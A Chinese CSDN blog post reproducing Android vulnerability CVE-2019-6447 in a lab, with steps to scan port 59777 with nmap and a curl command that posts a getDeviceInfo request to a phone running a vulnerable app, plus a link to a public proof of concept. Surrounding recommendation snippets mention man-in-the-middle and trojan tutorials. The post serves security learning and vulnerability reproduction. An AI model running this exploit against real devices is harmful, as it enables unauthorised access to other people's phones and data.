漏洞复现

最新推荐文章于 2024-06-18 14:20:54 发布
最新推荐文章于 2024-06-18 14:20:54 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 网络安全 文章标签: 漏洞 安卓 复现 CVE 2019-6447
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/axuhongbo/article/details/109861330
版权

本文为的安卓漏洞 CVE-2019-6447 复现
用到的apk下载链接:
APK下载链接

注意一定要用此版本的apk,其他版本的apk可能不包含此漏洞。

1 首先打开kali 虚拟机,然后一台手机1开热点,另一台手机2安装apk,打开在app界面,查看手机2的ip地址。
2 用nmap命令 指定扫描59777端口 查看是否打开,
若打开则显示open字样。
3 接着直接执行下方的命令。
或者下载POC源码,下载POC执行所需的环境requirements。
执行攻击命令,完成攻击。

curl --header "Content-Type: application/json" --request POST --data "{\"command\":getDeviceInfo}" http://192.168.43.251:59777 -vvv

Github-POC源码

参考链接

POC
参考链接1
参考链接2

axuhongbo
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali Linux 黑安卓,黑苹果不再孤单,iPhone成功运行“黑安卓”(附教程)
weixin_28752415的博客
05-13 3121
众多周知,和安卓的众多旗舰手机相比,iPhone的优势除了拥有强大的硬件之外,更重要的便是一整套完整的iOS生态系统,毕竟和安卓相比,iOS系统显得稳定,而且易于管理,这也是众多消费者不愿意更换iPhone以外手机的原因。那么换个思路,如果往iPhone手机里面导入安卓的操作系统,那又是一种怎样的体验呢?来自国外的一个团队近期发布了一段视频,在视频中,他们成功地突破了iPhone的安全保护,同时将...
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
常见逻辑漏洞复现合集(下)
Y_main的博客
06-18 643
测试漏洞:越权访问漏洞(Insecure Direct Object References,IDOR)指的是应用程序在验证用户对资源或功能的访问权限时出现的漏洞。具体来说,这种漏洞允许攻击者直接访问应用程序中的对象(例如文件、数据库记录、URL等),而无需经过适当的身份验证或授权检查。越权漏洞一般又分为垂直越权漏洞和水平越权漏洞。本文中的漏洞为水平越权漏洞。水平越权是指攻击者通过利用系统或应用程序中的逻辑错误,以获取其他用户相同权限级别下的资源或执行操作的漏洞
windows|kali安装charles
szgyunyun的博客
03-02 853
【代码】kali安装charles。
kali中间人攻击----盗取账号和密码
热门推荐
baidu_38803985的博客
04-10 1万+
声明: 本案例仅供个实验使用, 并不作任何违法违纪等不正当,请遵守约定。 1.原理解析 在局域网内通信都是通过交换机及路由器连接外部网络的, 对于局域网内大家都使用的一个协议 为ARP协议, 这个协议很奇特因为它是用来标定局域网内每台主机的MAC地址使用的, 还有就是ARP协 议也是用来规定网关的。   在我们下面要做的实验的过程中, kali系统会时刻向选定的机器发送“我是网关”, 这样堵塞了真...
实战 | 记一次对iphone手机游戏的渗透测试
leah126的博客
02-10 1564
各位师傅好,我是女鬼水妖,某高校大二学生,热爱网络安全,主攻红队方向。账号密码就是为了获取 _session,同时 _session 是固定不变的 所以就可以说这个 _session 可以绕过来进行。再加上我本来是比较喜欢打游戏的,经过某公司渗透授权,对此游戏进行渗透测试。1. 移动端游戏是比较少进行渗透,我相信漏洞也是很多的,师傅们可以自己去挖掘。我们的目的不是登录其他用户的账号,我们是看是否能直接进行对数据库进行读取。先进行登录,发现它居然是用明文传输,没有经过其他加密算法进行加密。
苹果系统新致命漏洞,黑客可以随意控制您的手机设备
w3cschools的博客
04-21 9756
国内知名黑客组织东方联盟的安全研究人员发现了苹果一个新的漏洞,可能会让黑客在您不知情的情况下访问您的iPhone和iPad。一旦用户授权他们的设备与黑客连接到同一个Wi-Fi网络,他们称这种漏洞为“信任劫持”,从而允许您无线管理iOS设备。东方联盟创始人兼黑客教父郭盛华:“一旦建立起这种信任关系,一切皆有可能,它引入了一种新的攻击媒介。”第一步需要您在安装完成后通过USB电缆将设备连接到计算机,但...
漏洞 复现
doraemon12345的博客
03-17 582
永恒之蓝(ms17_010) 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SMB(全称是Server Mes
记录安卓,IOS安装kali的办法
weixin_48465105的博客
11-08 1万+
纯做记录,不要用此技术做违法的事情,仅供研究,概不负责 一年前的小日记,照抄过来记录一下。 现在安卓有一个ZeroTermux更好用,可以傻瓜式安装kali,三星S10完美运行nmap等,下面的方法推荐Linux deploy。有兴趣的朋友可以交流 首先,你需要的装备: 1.一部手机or一部平板(反正便于携带的)最好是安卓 (ios有一定限制,其实也可以,但是步骤长,还需要注册海外ID,最讨厌的是IOS不方便搭梯子,你懂的) 2.你的装备必须root(不懂root,可以百度一下,手机连接电脑上下个软件roo
ios高版本app成功砸壳之kali使用frida-ios-dump砸壳
来到了学渣的博客
01-16 3707
前言 从事渗透这个行业,我相信百分之九十的人都是安服仔,安服仔就是要什么都懂一点点但是又不精通,碰到了困难也没办法从底层的原理去解决,但是为了能在这个社会混上一口饭,安服仔永远都是那种最拼命的人,那种干劲是无敌的!所以凭借着打不死的心态,解决了所谓"不可能解决的问题"。 所以可以相信我,跟着我的操作,保证你能成功砸的高版本ios app的ipa文件 1、越狱的ios手机配置好对应的frida版本 2、kali或者linux服务器,对应的egg文件放置在用户的目录下(解决python安装frida模块问题
kali局域网嗅探
jasdhasd的博客
03-23 4907
渗透测试
基于kali的一次无线渗透测试
qq_51913390的博客
06-21 4137
  首先对目标靶机所在无线接入点进行渗透,加入目标靶机所在局域网,然后使用ARP欺骗攻击,DNS劫持等进行局域网渗透。流程图如下图1-1所示: 1.:是一个抓包工具,提供airodump-ng、airepaly-ng、aircrack-ng等三个工具,分别用于探测附近的无线信息详细信息,解除认证攻击和无线密文离线破解。 2.:提供arpspoof工具进行arp欺骗攻击 3. :用于发现局域网存活的主机及其操作系统等信息 4. :用于图片嗅探 5. :提供Web服务用于DNS劫持 6. :进行arp欺骗及DN
metasploit、msfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3003
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
swagger漏洞复现
最新发布
06-29
Swagger 是一个流行的 API 设计和文档生成工具,但像任何软件一样,它可能存在安全漏洞复现 Swagger 漏洞通常...5. **证据收集**:记录下漏洞利用过程中的请求、响应以及任何敏感信息的泄露,作为漏洞复现的证据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值